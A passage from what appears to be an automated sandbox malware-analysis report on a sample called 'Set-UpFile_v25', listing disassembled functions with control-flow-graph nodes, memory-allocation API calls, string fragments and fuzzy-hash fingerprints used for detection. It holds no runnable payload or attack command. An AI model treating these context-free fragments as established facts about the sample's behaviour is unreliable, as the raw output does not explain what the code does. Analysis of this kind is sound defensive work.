                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(00000000,?,?), ref: 029D3A45
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                • String ID: .dll
                                                                                                                                                                • API String ID: 1029625771-2738580789
                                                                                                                                                                • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                • Instruction ID: bb7f3a2f184a43676be774521707b25255cacda861bd582b4086b84788b70486
                                                                                                                                                                • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                • Instruction Fuzzy Hash: 03210332700285DFEB21DFADD844B6ABBA8AF01725F0881ADDC458BA41D730E845DF85
                                                                                                                                                                Function 029D2605 Relevance: 2.8, APIs: 2, Instructions: 325memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 307 29d2605-29d2669 call 29d3bac * 3 314 29d266b-29d266d 307->314 315 29d2693 307->315 314->315 317 29d266f-29d2671 314->317 316 29d2696-29d26a0 315->316 317->315 318 29d2673-29d2685 VirtualAlloc 317->318 319 29d2687-29d268e 318->319 320 29d26a1-29d26c4 call 29d4021 call 29d4045 318->320 319->315 321 29d2690 319->321 326 29d270e-29d2727 call 29d3bac 320->326 327 29d26c6-29d26fc call 29d3d19 call 29d3bef 320->327 321->315 326->315 332 29d272d 326->332 336 29d295d-29d2966 327->336 337 29d2702-29d2708 327->337 334 29d2733-29d2739 332->334 338 29d273b-29d2741 334->338 339 29d2775-29d277e 334->339 340 29d296d-29d2975 336->340 341 29d2968-29d296b 336->341 337->326 337->336 342 29d2743-29d2746 338->342 343 29d27d7-29d27e2 339->343 344 29d2780-29d2786 339->344 346 29d29a4 340->346 347 29d2977-29d29a2 call 29d4045 340->347 341->340 341->346 350 29d2748-29d274d 342->350 351 29d275a-29d275c 342->351 348 29d27fb-29d27fe 343->348 349 29d27e4-29d27ed call 29d18f9 343->349 345 29d278a-29d27a5 call 29d3bac 344->345 367 29d27c4-29d27d5 345->367 368 29d27a7-29d27af 345->368 354 29d29a8-29d29c8 call 29d4045 VirtualFree 346->354 347->354 358 29d2959 348->358 359 29d2804-29d280d 348->359 349->358 370 29d27f3-29d27f9 349->370 350->351 356 29d274f-29d2758 350->356 351->339 357 29d275e-29d276c call 29d39b3 351->357 379 29d29ce-29d29d0 354->379 380 29d29ca 354->380 356->342 356->351 371 29d2771-29d2773 357->371 358->336 365 29d280f 359->365 366 29d2813-29d281a 359->366 365->366 372 29d281c-29d2825 call 29d1795 366->372 373 29d284a-29d284e 366->373 367->343 367->345 368->358 375 29d27b5-29d27be 368->375 370->366 371->334 384 29d2827-29d282d 372->384 385 29d2833-29d283c call 29d1890 372->385 377 29d2854-29d2876 373->377 378 29d28f0-29d28f3 373->378 375->358 375->367 377->358 393 29d287c-29d288f call 29d4021 377->393 382 29d2945-29d2947 call 29d2d35 378->382 383 29d28f5-29d28f8 378->383 379->316 380->379 392 29d294c-29d294d 382->392 383->382 386 29d28fa-29d28fd 383->386 384->358 384->385 385->373 400 29d283e-29d2844 385->400 390 29d28ff-29d2901 386->390 391 29d2916-29d2927 call 29d23f6 386->391 390->391 396 29d2903-29d2906 390->396 405 29d2929-29d2935 call 29d29d5 391->405 406 29d2938-29d2943 call 29d1ec2 391->406 397 29d294e-29d2955 392->397 408 29d2891-29d2895 393->408 409 29d28b3-29d28ec 393->409 401 29d290d-29d2914 call 29d35a3 396->401 402 29d2908-29d290b 396->402 397->358 403 29d2957 397->403 400->358 400->373 401->392 402->397 402->401 403->403 405->406 406->392 408->409 413 29d2897-29d289a 408->413 409->358 419 29d28ee 409->419 413->378 414 29d289c-29d28b1 call 29d3e24 413->414 414->419 419->378
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 029D267F
                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 029D29C3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$AllocFree
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2087232378-0
                                                                                                                                                                • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                • Instruction ID: 2874facc72592c79434197e24d24c34c402819ce4ac61f9768d5b03ed20d119e
                                                                                                                                                                • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                • Instruction Fuzzy Hash: 7BB1E131A00B02ABDB219FA0CD80BB7B7ADFF49314F108929ED9996152D731E551EFA1

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 0299FDC2 Relevance: 77.4, Strings: 61, Instructions: 1164COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: $ $"$#$$$%$'$'$)$.$/$0$0$1$3$4$4$5$6$6$6$9$9$;$;$;$=$?$?$B$B$B$C$F$I$I$J$N$P$R$T$T$V$V$[$]$^$^$_$e$k$k$k$m$o$r$s$u${$|$}
                                                                                                                                                                • API String ID: 0-2842158168
                                                                                                                                                                • Opcode ID: f16beb53404ff305d301fe2e17bf908e41086b851ee9555c847a5ffe03b2a07b
                                                                                                                                                                • Instruction ID: f43b8971c1a0c90c2d1278d35d75d167c07150797ba072eea600acda40aa1825
                                                                                                                                                                • Opcode Fuzzy Hash: f16beb53404ff305d301fe2e17bf908e41086b851ee9555c847a5ffe03b2a07b
                                                                                                                                                                • Instruction Fuzzy Hash: 87B28F3160C7C18BC3359A3C88643AEBBD1ABD6324F184A6DE4E98B3D2D7759845C793
                                                                                                                                                                Function 029928C9 Relevance: 13.3, Strings: 10, Instructions: 839COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 662 29928c9-29928e7 663 29928ec-29928fa 662->663 663->663 664 29928fc 663->664 665 29928fe-2992901 664->665 666 2992930-299296b call 2983092 665->666 667 2992903-299292e 665->667 670 2992970-299297e 666->670 667->665 670->670 671 2992980 670->671 672 2992982-2992985 671->672 673 29929a4-29929cb call 2983092 672->673 674 2992987-29929a2 672->674 677 29929cd-2992a1e call 2995f32 673->677 678 29929cf-29929d3 673->678 674->672 685 2992a20 677->685 686 2992a22-2992a69 call 2989b02 call 298c632 677->686 680 29934b2 678->680 682 2993f9f 680->682 684 2993fa1-2993fd6 call 2983722 682->684 693 2990cbc-2993fe7 684->693 694 2990cc3-2990cf1 call 2983732 684->694 685->686 698 2992a6e-2992a7c 686->698 701 2990cf6-2990d04 694->701 698->698 700 2992a7e-2992a80 698->700 702 2992a82-2992a85 700->702 701->701 703 2990d06 701->703 704 2992aa4-2992ac8 call 2983092 702->704 705 2992a87-2992aa2 702->705 706 2990d08-2990d0b 703->706 713 2992aca-2992aeb call 2995f32 704->713 714 2992b15-2992b3d call 2995f32 704->714 705->702 708 2990d0d-2990d34 706->708 709 2990d36-2990d5e call 2983622 706->709 708->706 715 2990d60-2990d85 709->715 716 2990d62 709->716 725 2992aed 713->725 726 2992aef-2992b10 call 2989b02 call 298c632 713->726 723 2992b3f 714->723 724 2992b41-2992bce call 2989b02 call 298c632 714->724 722 2990d8a-2990d98 715->722 716->684 722->722 727 2990d9a 722->727 723->724 742 2992bd3-2992bde 724->742 725->726 726->714 731 2990d9c-2990d9f 727->731 734 2990da1-2990dd0 731->734 735 2990dd2-2990e1d call 2983192 731->735 734->731 735->682 740 2990e23 735->740 740->682 742->742 743 2992be0 742->743 744 2992be2-2992be5 743->744 745 2992c4b-2992c5f 744->745 746 2992be7-2992c49 744->746 747 2992c61-2992c93 745->747 748 2992c63-2992c75 call 2989b12 745->748 746->744 752 2992c95 747->752 753 2992c97-2992ce9 call 2989b02 747->753 748->680 752->753 758 2992ceb-2992d0b call 2989b12 * 2 753->758 759 2992d10-2992d3f call 2989b12 753->759 778 29934b0 758->778 767 2992d44-2992d52 759->767 767->767 769 2992d54-2992d5b 767->769 771 2992d5d-2992d60 769->771 773 2992d9f-2992dbd call 2983092 771->773 774 2992d62-2992d9d 771->774 779 2992dbf-2992dea call 2995f32 773->779 780 2992e15-2992e33 773->780 774->771 778->680 785 2992dec 779->785 786 2992dee-2992e12 call 2989b02 call 298c632 779->786 782 2992e38-2992e46 780->782 782->782 784 2992e48-2992e4f 782->784 787 2992e51-2992e54 784->787 785->786 786->780 789 2992e87-2992ed0 call 2983392 787->789 790 2992e56-2992e85 787->790 795 2992ed5-2992ee3 789->795 790->787 795->795 797 2992ee5 795->797 798 2992ee7-2992eea 797->798 799 2992f70-2992f98 call 29832a2 798->799 800 2992ef0-2992f6b 798->800 803 2992f9e-2993033 call 2983722 799->803 804 2993394-299341b call 298a652 call 2996ec2 call 298b2c2 799->804 800->798 809 2993035 803->809 810 2993037-299305b call 2989b02 803->810 819 299341d-299342c 804->819 820 299344c-2993487 call 2989b12 * 2 804->820 809->810 817 299305d-2993068 810->817 818 299308c-299308e 810->818 825 299306a-299307b call 2996072 817->825 822 2993090-2993092 818->822 823 299342e 819->823 824 2993440-2993448 call 2989b12 819->824 854 2993489-2993492 call 2989b12 820->854 855 2993497-299349a 820->855 826 29930a0-29930e2 call 2983732 822->826 827 2993094-299309b 822->827 829 2993430-299343c call 2996222 823->829 824->820 840 299307d 825->840 841 299307f-299308a 825->841 842 29930e7-29930f5 826->842 827->804 844 299343e 829->844 840->825 841->818 842->842 845 29930f7 842->845 844->824 847 29930f9-29930fc 845->847 849 29930fe-2993144 847->849 850 2993146-2993186 call 2983092 847->850 849->847 858 299318b-2993199 850->858 854->855 859 299349c-299349f call 2989b12 855->859 860 29934a4-29934ab call 298a732 855->860 858->858 862 299319b-299319d 858->862 859->860 860->778 865 29931a1-29931a4 862->865 866 29931d8-2993220 call 2983092 865->866 867 29931a6-29931d6 865->867 870 2993225-2993233 866->870 867->865 870->870 871 2993235-2993237 870->871 872 299323e-2993241 871->872 873 29932a8-29932e7 call 2983392 872->873 874 2993243-29932a6 872->874 877 29932e9-29932ec 873->877 874->872 878 299330f-299338f call 2983392 call 2996092 877->878 879 29932ee-299330d 877->879 878->822 879->877
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: )$1$2$9$>$N$T$]$l${
                                                                                                                                                                • API String ID: 0-2785627941
                                                                                                                                                                • Opcode ID: 29be1ab724cc37f2a935c0d872581649a90bce668f56bf9511a07da9f2d5447f
                                                                                                                                                                • Instruction ID: 4847c509d17e0f88f25342ebe153743847d10f09678a8861b3f1ee8b22671b95
                                                                                                                                                                • Opcode Fuzzy Hash: 29be1ab724cc37f2a935c0d872581649a90bce668f56bf9511a07da9f2d5447f
                                                                                                                                                                • Instruction Fuzzy Hash: F4629F72A0C7808BDB249F3C88943AEBBD6ABC5324F194E7ED4E9873C1D67585458B06
                                                                                                                                                                Function 029934B7 Relevance: 11.8, Strings: 9, Instructions: 564COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 918 29934b7-29934d5 919 29934da-29934e8 918->919 919->919 920 29934ea 919->920 921 29934ec-29934ef 920->921 922 299350e-2993545 call 2983092 921->922 923 29934f1-299350c 921->923 926 299354a-2993558 922->926 923->921 926->926 927 299355a-2993562 926->927 928 2993564-2993567 927->928 929 2993569-29935b8 928->929 930 29935ba-29935e1 call 2983092 928->930 929->928 933 29935e3-299363c call 2995f32 930->933 934 29935e5-29935ed 930->934 941 299363e 933->941 942 2993640-29936a7 call 2989b02 call 298c632 call 2995f32 933->942 936 2993cca 934->936 937 2993f9f 936->937 940 2993fa1-2993fd6 call 2983722 937->940 949 2990cbc-2993fe7 940->949 950 2990cc3-2990cf1 call 2983732 940->950 941->942 958 29936a9 942->958 959 29936ab-2993774 call 2989b02 call 298c632 942->959 957 2990cf6-2990d04 950->957 957->957 960 2990d06 957->960 958->959 975 2993776-2993779 959->975 962 2990d08-2990d0b 960->962 964 2990d0d-2990d34 962->964 965 2990d36-2990d5e call 2983622 962->965 964->962 970 2990d60-2990d85 965->970 971 2990d62 965->971 974 2990d8a-2990d98 970->974 971->940 974->974 976 2990d9a 974->976 977 299377b-29937b5 975->977 978 29937b7-29937c8 975->978 981 2990d9c-2990d9f 976->981 977->975 979 29937ca-29937d8 call 2989b12 978->979 980 29937dd-29937f6 978->980 979->936 983 29937f8 980->983 984 29937fa-2993854 call 2989b02 980->984 985 2990da1-2990dd0 981->985 986 2990dd2-2990e1d call 2983192 981->986 983->984 995 2993875-299389b call 2989b12 984->995 996 2993856-2993870 call 2989b12 * 2 984->996 985->981 986->937 993 2990e23 986->993 993->937 1004 29938a0-29938ab 995->1004 1012 2993cc8 996->1012 1004->1004 1006 29938ad-29938af 1004->1006 1008 29938b3-29938b6 1006->1008 1010 29938f9-2993944 call 2983392 1008->1010 1011 29938b8-29938f7 1008->1011 1015 2993947-2993955 1010->1015 1011->1008 1012->936 1015->1015 1016 2993957 1015->1016 1017 2993959-299395c 1016->1017 1018 299395e-2993982 1017->1018 1019 2993984-29939a1 call 29832a2 1017->1019 1018->1017 1022 2993bd7-2993c5c call 298a652 call 29a1622 call 298b2c2 1019->1022 1023 29939a7-29939d7 call 2983722 1019->1023 1040 2993c99-2993cc6 call 2989b12 * 2 call 298a732 1022->1040 1041 2993c5e-2993c71 1022->1041 1028 29939d9 1023->1028 1029 29939db-29939f9 call 2989b02 1023->1029 1028->1029 1035 29939fb-2993a02 1029->1035 1036 2993a1f-2993a28 1029->1036 1039 2993a04-2993a10 call 2996252 1035->1039 1038 2993a2a-2993a2c 1036->1038 1044 2993a3a-2993a6d call 2983732 1038->1044 1045 2993a2e-2993a35 1038->1045 1053 2993a12-2993a1d 1039->1053 1040->1012 1042 2993c73-2993c75 1041->1042 1043 2993c87-2993c97 call 2989b12 1041->1043 1049 2993c77-2993c83 call 2996332 1042->1049 1043->1040 1059 2993a72-2993a7d 1044->1059 1045->1022 1061 2993c85 1049->1061 1053->1036 1059->1059 1062 2993a7f 1059->1062 1061->1043 1064 2993a81-2993a84 1062->1064 1066 2993ad7-2993b12 call 2983092 1064->1066 1067 2993a86-2993ad5 1064->1067 1073 2993b17-2993b22 1066->1073 1067->1064 1073->1073 1074 2993b24-2993b26 1073->1074 1075 2993b2a-2993b2d 1074->1075 1076 2993b2f-2993b7c 1075->1076 1077 2993b7e-2993bd2 call 2983092 call 2996262 1075->1077 1076->1075 1077->1038
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: '$($0$C$C$T$Z$h$x
                                                                                                                                                                • API String ID: 0-3884181529
                                                                                                                                                                • Opcode ID: 8edd2ca0f0b3a5a5022e85e3e912420404d46cfab8ccbbe3701cf475f3fdaf82
                                                                                                                                                                • Instruction ID: 41a02727460419861052daa51a67955ebe8e3e890c3aaf8ccce4f84c14ea8d81
                                                                                                                                                                • Opcode Fuzzy Hash: 8edd2ca0f0b3a5a5022e85e3e912420404d46cfab8ccbbe3701cf475f3fdaf82
                                                                                                                                                                • Instruction Fuzzy Hash: FE22BF7260D7808BD724AF38C4943AEBBE6ABC5324F194E6ED4D987381DA748905CB47
                                                                                                                                                                Function 029A3B42 Relevance: 11.7, Strings: 9, Instructions: 472COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1082 29a3b42-29a3b87 call 29c52c2 1085 29a3b8d-29a3bc6 call 29963b2 call 29c0932 1082->1085 1086 29a41f3-29a4203 1082->1086 1091 29a3bc8-29a3bd3 1085->1091 1092 29a3bda-29a3bef 1091->1092 1093 29a3bd5 1091->1093 1095 29a3bf1 1092->1095 1096 29a3bf6-29a3c02 1092->1096 1094 29a3c92-29a3c9a 1093->1094 1097 29a3c9e-29a3ca3 1094->1097 1098 29a3c9c 1094->1098 1099 29a3c7a-29a3c7d 1095->1099 1096->1099 1100 29a3c04-29a3c75 call 29c20b2 1096->1100 1104 29a3ca9-29a3cbe 1097->1104 1105 29a418c-29a4198 call 29c0952 1097->1105 1098->1097 1102 29a3c7f 1099->1102 1103 29a3c81-29a3c8d 1099->1103 1100->1099 1102->1094 1103->1091 1107 29a3cc0-29a3ce0 1104->1107 1115 29a419a-29a41a0 1105->1115 1109 29a3ef8-29a3efb 1107->1109 1110 29a3ce6-29a3d08 1107->1110 1112 29a3efd-29a3f01 1109->1112 1113 29a3f03-29a3f14 call 29c0932 1109->1113 1114 29a3d0d-29a3d18 1110->1114 1116 29a3f2a-29a3f2c 1112->1116 1132 29a3f26-29a3f28 1113->1132 1133 29a3f16-29a3f21 1113->1133 1114->1114 1118 29a3d1a-29a3d1e 1114->1118 1119 29a41a2 1115->1119 1120 29a41a4-29a41b8 1115->1120 1123 29a3f32-29a3f56 1116->1123 1124 29a4165-29a416a 1116->1124 1122 29a3d20-29a3d23 1118->1122 1119->1086 1125 29a41ba 1120->1125 1126 29a41bc-29a41c3 1120->1126 1134 29a3d59-29a3d82 call 29a4212 1122->1134 1135 29a3d25-29a3d57 1122->1135 1127 29a3f58-29a3f5b 1123->1127 1130 29a416c-29a4174 1124->1130 1131 29a4176-29a417a 1124->1131 1128 29a41e3-29a41e6 1125->1128 1126->1128 1129 29a41c5-29a41de call 29c20b2 1126->1129 1137 29a3faf-29a3fc7 1127->1137 1138 29a3f5d-29a3fad 1127->1138 1140 29a41e8-29a41ea 1128->1140 1141 29a41ec-29a41f1 1128->1141 1129->1128 1142 29a417c 1130->1142 1131->1142 1132->1116 1143 29a417e-29a4182 1133->1143 1134->1109 1147 29a3d88-29a3dae 1134->1147 1135->1122 1145 29a3fcb-29a3fd6 1137->1145 1138->1127 1140->1086 1141->1115 1142->1143 1143->1107 1146 29a4188-29a418a 1143->1146 1148 29a3fd8 1145->1148 1149 29a3fdd-29a3ff7 1145->1149 1146->1105 1151 29a3db3-29a3dbe 1147->1151 1152 29a40ae-29a40c1 1148->1152 1153 29a3ff9 1149->1153 1154 29a3ffe-29a400a 1149->1154 1151->1151 1155 29a3dc0-29a3dc4 1151->1155 1158 29a40c3 1152->1158 1159 29a40c5-29a40e1 1152->1159 1156 29a4094-29a4099 1153->1156 1154->1156 1157 29a4010-29a408f call 29c20b2 1154->1157 1161 29a3dc6-29a3dc9 1155->1161 1163 29a409b 1156->1163 1164 29a409d-29a40a9 1156->1164 1157->1156 1158->1159 1160 29a40e3-29a40e6 1159->1160 1165 29a40e8-29a40fd 1160->1165 1166 29a40ff-29a4105 1160->1166 1167 29a3e2b-29a3e51 call 29a4212 1161->1167 1168 29a3dcb-29a3e29 1161->1168 1163->1152 1164->1145 1165->1160 1170 29a4137-29a413f 1166->1170 1171 29a4107-29a410b 1166->1171 1180 29a3e58-29a3e6f 1167->1180 1181 29a3e53 1167->1181 1168->1161 1175 29a4152-29a4154 1170->1175 1176 29a4141-29a4150 call 29c0952 1170->1176 1173 29a410d-29a4114 1171->1173 1178 29a4116-29a4122 1173->1178 1179 29a4124-29a412b 1173->1179 1177 29a4156-29a4159 1175->1177 1176->1177 1177->1124 1183 29a415b-29a4163 1177->1183 1178->1173 1184 29a412d 1179->1184 1185 29a4133-29a4135 1179->1185 1186 29a3e73-29a3ef6 call 2989b02 call 2995fb2 call 2989b12 1180->1186 1187 29a3e71 1180->1187 1181->1109 1183->1143 1184->1185 1185->1170 1186->1109 1187->1186
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: !@$($)$,$5$7$p$q$w
                                                                                                                                                                • API String ID: 0-1769235293
                                                                                                                                                                • Opcode ID: 0e194027626a9452c8d75cee691d622472ab34534f316d22095298861fa9516e
                                                                                                                                                                • Instruction ID: edb9b87fd769d848648fd79e01922cb443bffa3f365bdcd372c9a0f951cbaad3
                                                                                                                                                                • Opcode Fuzzy Hash: 0e194027626a9452c8d75cee691d622472ab34534f316d22095298861fa9516e
                                                                                                                                                                • Instruction Fuzzy Hash: 3E12BB7160C3908FD3248F28C4A536EBBE1ABD5314F198E6EE4D987391D7B98845CB86
                                                                                                                                                                Function 029BD522 Relevance: 10.9, Strings: 8, Instructions: 923COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1198 29bd522-29bd551 1199 29bd552-29bd5c8 1198->1199 1199->1199 1200 29bd5ca-29bd5e1 1199->1200 1201 29bd5e2-29bd611 1200->1201 1201->1201 1202 29bd613-29bd661 1201->1202 1203 29bd662-29bd6a6 1202->1203 1203->1203 1204 29bd6a8-29bd6c8 1203->1204 1206 29bd6ce-29bd6f7 1204->1206 1207 29bd7a4-29bd7bc 1204->1207 1208 29bd702-29bd735 1206->1208 1209 29bd7c2-29bd821 1207->1209 1208->1208 1210 29bd737-29bd76b 1208->1210 1209->1209 1211 29bd823-29bd887 1209->1211 1212 29bd772-29bd796 1210->1212 1213 29bd892-29bd8e4 1211->1213 1212->1212 1214 29bd798-29bd79c 1212->1214 1213->1213 1215 29bd8e6-29bd949 1213->1215 1214->1207 1216 29bd952-29bd97d 1215->1216 1216->1216 1217 29bd97f-29bd9cd 1216->1217 1219 29bdf0d-29bdf40 call 29c3a32 1217->1219 1220 29bd9d3-29bda0b 1217->1220 1227 29bdf49-29bdf4b 1219->1227 1228 29bdf42-29bdf45 1219->1228 1221 29bda12-29bda5f 1220->1221 1221->1221 1223 29bda61-29bda8a 1221->1223 1233 29bdefc-29bdf09 1223->1233 1234 29bda90-29bdaaa 1223->1234 1229 29bdf5f-29bdf6a 1227->1229 1228->1227 1231 29bdf6c-29bdf73 1229->1231 1232 29bdf76-29bdf94 1229->1232 1231->1232 1235 29bdfa2-29bdfc0 1232->1235 1233->1219 1240 29bdef2-29bdef8 1234->1240 1241 29bdab0-29bdad9 1234->1241 1235->1235 1236 29bdfc2-29bdff8 1235->1236 1239 29be002-29be014 1236->1239 1239->1239 1242 29be016-29be03d call 299fc42 1239->1242 1240->1233 1243 29bdae2-29bdaf4 1241->1243 1247 29be042-29be04a 1242->1247 1243->1243 1245 29bdaf6-29bdb71 1243->1245 1250 29bdb72-29bdb84 1245->1250 1247->1247 1249 29be04c-29be04e 1247->1249 1252 29bdf52-29bdf59 1249->1252 1253 29be054-29be064 call 2989b82 1249->1253 1250->1250 1251 29bdb86-29bdbaa 1250->1251 1259 29bdee3-29bdeec 1251->1259 1260 29bdbb0-29bdbd2 1251->1260 1252->1229 1254 29be069-29be070 1252->1254 1253->1252 1259->1240 1263 29bded9-29bdedf 1260->1263 1264 29bdbd8-29bdbdb 1260->1264 1263->1259 1264->1263 1265 29bdbe1-29bdbe6 1264->1265 1265->1263 1266 29bdbec-29bdc46 1265->1266 1268 29bdc52-29bdc6e 1266->1268 1268->1268 1269 29bdc70-29bdc8c 1268->1269 1271 29bdec8-29bded5 1269->1271 1272 29bdc92-29bdc98 1269->1272 1271->1263 1272->1271 1273 29bdc9e-29bdcaa 1272->1273 1274 29bdcef-29bdcf1 1273->1274 1275 29bdcac-29bdcb3 1273->1275 1278 29bdcf3-29bdd25 call 2989b02 1274->1278 1277 29bdcce-29bdcd2 1275->1277 1279 29bdcc2 1277->1279 1280 29bdcd4-29bdcdd 1277->1280 1287 29bdd2b-29bdd39 1278->1287 1288 29bde6a-29bde89 1278->1288 1282 29bdcc3-29bdccc 1279->1282 1283 29bdcdf-29bdce2 1280->1283 1284 29bdce4-29bdce8 1280->1284 1282->1277 1282->1278 1283->1282 1284->1282 1286 29bdcea-29bdced 1284->1286 1286->1282 1287->1288 1289 29bdd3f-29bdd43 1287->1289 1290 29bde8b 1288->1290 1291 29bde90-29bde9c 1288->1291 1292 29bdd52-29bdd5c 1289->1292 1290->1291 1293 29bde9e 1291->1293 1294 29bdea3-29bdec5 call 2989b32 call 2989b12 1291->1294 1295 29bdd5e-29bdd63 1292->1295 1296 29bdd72-29bdd78 1292->1296 1293->1294 1294->1271 1298 29bde12-29bde18 1295->1298 1299 29bdd7a-29bdd7d 1296->1299 1300 29bdd97-29bdda5 1296->1300 1306 29bde1a-29bde20 1298->1306 1299->1300 1302 29bdd7f-29bdd95 1299->1302 1303 29bddab-29bddae 1300->1303 1304 29bde2c-29bde35 1300->1304 1302->1298 1303->1304 1307 29bddb0-29bde0c 1303->1307 1310 29bde3b-29bde3e 1304->1310 1311 29bde37-29bde39 1304->1311 1306->1288 1309 29bde22-29bde24 1306->1309 1307->1298 1309->1292 1314 29bde2a 1309->1314 1312 29bde40-29bde64 1310->1312 1313 29bde66-29bde68 1310->1313 1311->1306 1312->1298 1313->1298 1314->1288
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: x~$()$*LMB$=hn$FgsQ$gD?z$gd$t"j
                                                                                                                                                                • API String ID: 0-2687496081
                                                                                                                                                                • Opcode ID: 1163f18ff1ef8d99059eadc189b0277bd35e59365f1577b9463e0776543c12d5
                                                                                                                                                                • Instruction ID: 4b5bc8d42332d227a8e44da869c39c49cb01cb886608cbd4da0adfd20b875306
                                                                                                                                                                • Opcode Fuzzy Hash: 1163f18ff1ef8d99059eadc189b0277bd35e59365f1577b9463e0776543c12d5
                                                                                                                                                                • Instruction Fuzzy Hash: 705202766083418BD314CF29C9917ABBBE6EFC5314F198A2CE5D58B390DB78D805CB92
                                                                                                                                                                Function 0298B2C2 Relevance: 10.4, Strings: 8, Instructions: 387COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
